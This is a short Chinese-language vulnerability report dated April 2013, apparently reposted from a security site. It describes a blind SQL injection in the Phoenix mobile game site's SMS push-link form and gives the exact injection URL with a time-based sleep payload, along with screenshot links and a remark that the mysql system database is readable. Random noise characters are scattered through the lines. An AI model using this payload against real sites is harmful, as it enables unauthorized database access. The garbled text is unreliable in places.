简要描述:. R+ C3 _4 A0 D2 f: N$ H' M
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。3 Y y9 J! ?8 i. y# S; k
6 v- W+ L j- y [8 t
详细说明:* d9 j( x( U! {: w6 l
存在SQL盲注url:- F6 I4 |8 U+ p0 s/ {; |
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
2 I8 X+ J2 d. q G4 b0 _2 Y/ Xhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
1 O( l6 a9 x/ e8 i% P( D ]http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png- M& U; c9 z' F6 M* b/ |0 x' T
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg( C( F E. Z. S6 q! c( t, O S
; ?% l1 g5 a+ s6 o, b7 U能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对